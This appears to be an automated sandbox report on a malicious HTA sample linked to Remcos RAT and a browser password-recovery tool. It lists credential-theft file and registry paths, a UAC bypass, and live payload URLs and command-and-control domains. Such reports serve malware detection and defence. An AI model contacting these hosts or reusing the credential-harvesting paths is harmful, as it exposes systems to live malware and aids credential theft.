Source: Yara match	File source: C:\Users\user\AppData\Roaming\jasgbtisot.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

8_2_0040B59B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		8_2_0040B6B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: \key3.db		8_2_0040B6B5

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Paltalk	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\recover.exe	Code function: ESMTPPassword	10_2_004033F0
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword	10_2_00402DB3
Source: C:\Windows\SysWOW64\recover.exe	Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword	10_2_00402DB3

Yara detected WebBrowserPassView password recovery tool

Source: Yara match	File source: 8.2.CasPol.exe.4540000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.recover.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.4540000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.recover.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: recover.exe PID: 5648, type: MEMORYSTR

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\jasgbtisot.dat, type: DROPPED

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: cmd.exe

8_2_00405091

Screenshots

Behavior

Click here to start
Slideshow Behavior Animation

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.186.113.60	paste.ee	Reserved	49466	KLAYER-GLOBALNL	false
217.154.55.185	unknown	United Kingdom	8897	KCOM-SPNService-ProviderNetworkex-MistralGB	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
192.169.69.26	hftook7lmaroutsg1.duckdns.org	United States	23033	WOWUS	true
172.245.123.32	unknown	United States	36352	AS-COLOCROSSINGUS	true
176.65.144.247	hftook7lmaroutsg2.duckdns.org	Germany	12975	PALTEL-ASPALTELAutonomousSystemPS	true

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
paste.ee	23.186.113.60	true
geoplugin.net	178.237.33.50	true
hftook7lmaroutsg2.duckdns.org	176.65.144.247	true
hftook7lmaroutsg1.duckdns.org	192.169.69.26	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://paste.ee/d/c30NOIBR/0	false		high
http://217.154.55.185/xampp/c/new_image.jpg	true	Avira URL Cloud: safe	unknown
http://172.245.123.32/xampp/visa/creatingbestthingsforhisbeststepstotakehim.txt	true	Avira URL Cloud: safe	unknown
hftook7lmaroutsg5.duckdns.org	true	Avira URL Cloud: safe	unknown
hftook7lmaroutsg4.duckdns.org	true	Avira URL Cloud: safe	unknown
hftook7lmaroutsg3.duckdns.org	true	Avira URL Cloud: safe	unknown
hftook7lmaroutsg2.duckdns.org	true	Avira URL Cloud: safe	unknown
hftook7lmaroutsg1.duckdns.org	true	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp	false		high

AV Detection

Found malware configuration

Source: 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp

Multi AV Scanner detection for submitted file

Source: creatingbestthingsforhisbeststepstotakehim.hta	Virustotal: Detection: 23%			Perma Link
Source: creatingbestthingsforhisbeststepstotakehim.hta	ReversingLabs: Detection: 19%

Yara detected Remcos RAT

Source: Yara match	File source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\jasgbtisot.dat, type: DROPPED

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 99.5%

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

8_2_00433B64

Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_621c287e-5

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 8.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.powershell.exe.6424cd0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5748, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00406ABC _wcslen,CoGetObject,

8_2_00406ABC

Source: unknown

HTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.8:49692 version: TLS 1.2

Source:	Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheaderdnlib.dotnet.mdrawmodulerowdnlib.dotnetimdtokenprovidermddnlib.pervadnlib.dotnet.writermodulewriteroptionsbase source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: `2dnlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.dotnetfullnamecreatordnlib.dotnet.emitnativemethodbodydnlib.
Source:	Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype( source: powershell.exe, 00000005.00000002.1092678242.00000000077F0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflags source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 00000005.00000002.1092714773.000000000780A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000005.00000002.1103193592.0000000009730000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.000000000610A000.00000004.00000800.00020000.00000000.sdmp

Spreading

Yara detected VBS Downloader Generic

Source: Yara match	File source: C:\Windows\Temp\anonymiser.bat, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\Sheena.vbs, type: DROPPED

